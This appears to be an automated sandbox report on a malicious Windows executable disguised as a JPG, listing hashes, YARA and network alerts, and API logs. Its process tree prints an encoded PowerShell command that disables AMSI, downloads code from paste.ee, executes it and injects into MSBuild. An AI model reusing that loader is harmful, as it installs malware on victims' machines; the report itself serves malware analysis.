Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 22, 2021, 5:19 p.m.	April 22, 2021, 5:21 p.m.

Size	849.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`82b9be6f5cc10510495e9a3368683747`
SHA256	`3fc28498833acc5f00efedc5d9392acf326cc940e2dd255544416c3863c109ab`
CRC32	`C149A282`
ssdeep	`24576:UAHnh+eWsN3skA4RV1Hom2KXMmHaen95:jh+ZkldoPK8Yae3`
Yara	Device_Check_Zero - Device Check Zero Process_Snapshot_Kill_Zero - Process Kill Zero CryptGenKey_Zero - CryptGenKey Zero FindFirstVolume_Zero - FindFirstVolume Zero inject_thread - Code injection with CreateRemoteThread in a remote process network_http - Communications over HTTP escalate_priv - Escalade priviledges screenshot - Take screenshot keylogger - Run a keylogger win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration Str_Win32_Wininet_Library - Match Windows Inet API library declaration Str_Win32_Internet_API - Match Windows Inet API call Str_Win32_Http_API - Match Windows Http API call PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) HasDebugData - DebugData Check HasRichSignature - Rich Signature Check AutoIt - www.autoitscript.com/site/autoit/

melo.jpg.exe "C:\Users\test22\AppData\Local\Temp\melo.jpg.exe"
5580
- powershell.exe powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
  2352
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e WwBkAG8AdQBiAGwAZQBdACQAbwBzAHYAZQByACAAPQAgAFsAcwB0AHIAaQBuAGcAXQBbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4ALgBtAGEAagBvAHIAIAArACAAJwAuACcAIAArACAAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuAC4AbQBpAG4AbwByADsAaQBmACAAKAAkAG8AcwB2AGUAcgAgAC0AZwBlACAAMQAwAC4AMAApACAAewBlAGMAaABvACAAVwBpAG4AZABvAHcAcwAxADAAOwAkAEUAVwBBAEEARAA9AFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEEAbABsAG8AYwBIAEcAbABvAGIAYQBsACgAKAAzADYAKwA5ADAANAAwACkAKQA7AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAiAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgAkACgAWwBDAGgAYQBSAF0AKAAzADMAKwAzADIAKQArAFsAYwBoAGEAcgBdACgAWwBiAFkAdABlAF0AMAB4ADYARAApACsAWwBjAGgAQQByAF0AKABbAEIAWQBUAGUAXQAwAHgANwAzACkAKwBbAEMAaABhAHIAXQAoAFsAQgB5AHQAZQBdADAAeAA2ADkAKQApAFUAdABpAGwAcwAiACkALgBHAGUAdABGAGkAZQBsAGQAKAAiACQAKABbAHMAWQBzAFQARQBNAC4AbgBlAHQALgBXAEUAYgB1AHQASQBsAGkAdAB5AF0AOgA6AEgAVABNAEwAZABlAEMATwBkAGUAKAAnACYAIwA5ADcAOwAmACMAMQAwADkAOwAmACMAMQAxADUAOwAmACMAMQAwADUAOwAnACkAKQBTAGUAcwBzAGkAbwBuACIALAAgACIATgAiACsAIgBvACIAKwAiAG4AIgArACIAUAAiACsAIgB1ACIAKwAiAGIAIgArACIAbAAiACsAIgBpACIAKwAiAGMAIgArACIALAAiACsAIgBTACIAKwAiAHQAIgArACIAYQAiACsAIgB0ACIAKwAiAGkAIgArACIAYwAiACkALgBTAGUAdABWAGEAbAB1AGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsAWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACIAUwAiACsAIgB5ACIAKwAiAHMAIgArACIAdAAiACsAIgBlACIAKwAiAG0AIgArACIALgAiACsAIgBNACIAKwAiAGEAIgArACIAbgAiACsAIgBhACIAKwAiAGcAIgArACIAZQAiACsAIgBtACIAKwAiAGUAIgArACIAbgAiACsAIgB0ACIAKwAiAC4AIgArACIAQQAiACsAIgB1ACIAKwAiAHQAIgArACIAbwAiACsAIgBtACIAKwAiAGEAIgArACIAdAAiACsAIgBpAG8AIgArACIAbgAuACQAKABbAEMAaABhAFIAXQAoADMAMwArADMAMgApACsAWwBjAGgAYQByAF0AKABbAGIAWQB0AGUAXQAwAHgANgBEACkAKwBbAGMAaABBAHIAXQAoAFsAQgBZAFQAZQBdADAAeAA3ADMAKQArAFsAQwBoAGEAcgBdACgAWwBCAHkAdABlAF0AMAB4ADYAOQApACkAIgArACIAVQAiACsAIgB0ACIAKwAiAGkAIgArACIAbAAiACsAIgBzACIAKQAuAEcAZQB0AEYAaQBlAGwAZAAoACIAJAAoAFsAcwBZAHMAVABFAE0ALgBuAGUAdAAuAFcARQBiAHUAdABJAGwAaQB0AHkAXQA6ADoASABUAE0ATABkAGUAQwBPAGQAZQAoACcAJgAjADkANwA7ACYAIwAxADAAOQA7ACYAIwAxADEANQA7ACYAIwAxADAANQA7ACcAKQApACIAKwAiAEMAIgArACIAbwAiACsAIgBuACIAKwAiAHQAIgArACIAZQAiACsAIgB4ACIAKwAiAHQAIgAsACAAIgBOACIAKwAiAG8AIgArACIAbgAiACsAIgBQACIAKwAiAHUAIgArACIAYgAiACsAIgBsACIAKwAiAGkAIgArACIAYwAsAFMAIgArACIAdAAiACsAIgBhACIAKwAiAHQAIgArACIAaQAiACsAIgBjACIAKQAuAFMAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAAsACAAWwBJAG4AdABQAHQAcgBdACQARQBXAEEAQQBEACkAOwB9AGUAbABzAGUAIAB7AH0AOwANAAoAJAByAGUAZwAgAD0AIAAoACcAewAyAH0AewAwAH0AewAxAH0AewAzAH0AJwAtAGYAJwBkAFMAdAAnACwAJwByAGkAbgAnACwAHCBgAEQAYABvAGAAdwBuAGAAbABgAG8AYQAdICwAJwBnACcAKQA7AFsAdgBvAGkAZABdACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZABXAGkAdABoAFAAYQByAHQAaQBhAGwATgBhAG0AZQAoACcATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMAJwApADsAJABmAGoAPQBbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4ASQBuAHQAZQByAGEAYwB0AGkAbwBuAF0AOgA6AEMAYQBsAGwAQgB5AG4AYQBtAGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALAAkAHIAZQBnACwAWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEMAYQBsAGwAVAB5AHAAZQBdADoAOgBNAGUAdABoAG8AZAAsACcAaAB0AHQAJwArAFsAQwBoAGEAcgBdADgAMAArACcAcwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AbwBTAGwAWQBKACcAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBwADcARQBIAEMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAWQAuAE0AXQA6ADoAUQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA7AA==
    6096
    - MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe"
      3752

Name	Response	Post-Analysis Lookup
edgedl.gvt1.com	A 142.250.34.2	142.250.34.2
paste.ee	A 104.26.4.223 A 172.67.68.88 A 104.26.5.223	104.26.4.223

IP Address	Status	Action
104.26.5.223	Active	Moloch
142.250.204.110	Active	Moloch
142.250.34.2	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49810 -> 104.26.5.223:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49814 -> 142.250.204.110:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 142.250.34.2:80 -> 192.168.56.102:49816	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 142.250.34.2:80 -> 192.168.56.102:49816	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 192.168.56.102:49815 -> 172.217.161.131:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49810 104.26.5.223:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	e8:17:95:f3:a8:85:c4:14:59:ce:21:47:7d:34:50:64:8f:1c:2b:7f
TLS 1.2 192.168.56.102:49814 142.250.204.110:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com	2f:5c:43:f2:d2:53:75:f8:0a:ac:79:a2:90:87:26:97:e9:8a:c9:0a
TLS 1.2 192.168.56.102:49815 172.217.161.131:443	C=US, O=Google Trust Services, CN=GTS CA 1O1	C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com	c2:b5:f0:1b:46:55:3f:d3:65:b2:1d:5c:cc:56:a7:41:ac:9c:7a:22

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 22, 2021, 5:19 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 22, 2021, 5:19 p.m.			0	0
IsDebuggerPresent April 22, 2021, 5:19 p.m.			0	0
IsDebuggerPresent April 22, 2021, 5:19 p.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW April 22, 2021, 5:19 p.m.	buffer: True console_handle: 0x00000013	1	1	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007474a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746ae0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746e60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00746aa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007473e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x007466e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00747220 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029a680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029ad80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029ad80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029ad80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 22, 2021, 5:19 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0029b040 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 22, 2021, 5:19 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

